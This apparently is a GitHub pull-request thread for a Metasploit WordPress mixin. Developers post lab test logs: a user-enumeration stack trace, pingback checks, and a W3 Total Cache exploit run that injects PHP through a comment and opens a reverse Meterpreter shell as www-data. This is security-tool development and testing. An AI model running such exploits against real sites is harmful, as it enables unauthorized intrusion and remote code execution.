[*] /wordpress-2.0/ - WordPress Version 2.0 detected
[*] /wordpress-2.0/ - WordPress User-Enumeration - Running User Enumeration
[-] Auxiliary failed: ArgumentError comparison of String with 1 failed
[-] Call stack:
[-]   /Users/juan/Projects/git/metasploit-framework/lib/msf/http/wordpress/users.rb:28:in `<'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/msf/http/wordpress/users.rb:28:in `wordpress_userid_exists?'
[-]   /Users/juan/Projects/git/metasploit-framework/modules/auxiliary/scanner/http/wordpress_login_enum.rb:155:in `block in enum_usernames'
[-]   /Users/juan/Projects/git/metasploit-framework/modules/auxiliary/scanner/http/wordpress_login_enum.rb:154:in `upto'
[-]   /Users/juan/Projects/git/metasploit-framework/modules/auxiliary/scanner/http/wordpress_login_enum.rb:154:in `each'
[-]   /Users/juan/Projects/git/metasploit-framework/modules/auxiliary/scanner/http/wordpress_login_enum.rb:154:in `enum_usernames'
[-]   /Users/juan/Projects/git/metasploit-framework/modules/auxiliary/scanner/http/wordpress_login_enum.rb:60:in `run_host'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/msf/core/auxiliary/scanner.rb:94:in `block in run'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `call'
[-]   /Users/juan/Projects/git/metasploit-framework/lib/msf/core/thread_manager.rb:100:in `block in spawn'
[*] Auxiliary module execution completed

jvazquez-r7 commented 10 years ago

wordpress_pingback_access working after all

msf auxiliary(wordpress_pingback_access) > run

[-] 192.168.172.130 does not seeem to be Wordpress site
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_pingback_access) > set TARGETURI /wordpress-2.0/
TARGETURI => /wordpress-2.0/
msf auxiliary(wordpress_pingback_access) > run

[+] 192.168.172.130 - Pingback enabled: /wordpress-2.0
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_pingback_access) > set TARGETURI /wordpress-2.5/
TARGETURI => /wordpress-2.5/
msf auxiliary(wordpress_pingback_access) > run

[+] 192.168.172.130 - Pingback enabled: /wordpress-2.5
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_pingback_access) > set TARGETURI /wordpress-2.5
TARGETURI => /wordpress-2.5
msf auxiliary(wordpress_pingback_access) > run

[-] 192.168.172.130 does not seeem to be Wordpress site
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wordpress_pingback_access) > set TARGETURI /wordpress-3.6/
TARGETURI => /wordpress-3.6/
msf auxiliary(wordpress_pingback_access) > run

[+] 192.168.172.130 - Pingback enabled: /wordpress-3.6
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

jvazquez-r7 commented 10 years ago

Also php_wordpress_total_cache:

msf exploit(php_wordpress_total_cache) > set TARGETURI /wordpress-3.5/
TARGETURI => /wordpress-3.5/
msf exploit(php_wordpress_total_cache) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(php_wordpress_total_cache) > set USERNAME admin
USERNAME => admin
msf exploit(php_wordpress_total_cache) > set PASSWORD admin
PASSWORD => admin
msf exploit(php_wordpress_total_cache) > set RHOST 192.168.172.228
RHOST => 192.168.172.228
msf exploit(php_wordpress_total_cache) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.228:80 - Trying to login...
[*] 192.168.172.228:80 - login successful
[*] 192.168.172.228:80 - Trying to get posts from feed...
[*] 192.168.172.228:80 - Found Post POST ID 34...
[*] 192.168.172.228:80 - Injecting the PHP Code in a comment...
[*] 192.168.172.228:80 - Executing the payload...
[*] Sending stage (39195 bytes) to 192.168.172.228
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.228:40460) at 2013-09-24 17:30:27 -0500
id

c^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter >

wordpress_login_enum problems is my only stopper atm

jvazquez-r7 commented 10 years ago

okey, last test, since there hasn't been stoppers, neither any other feedback from devs, landing it in minutes :)

rapid7 / metasploit-framework

Wordpress mixin #2267

Changes

TODO:

TODO after merge: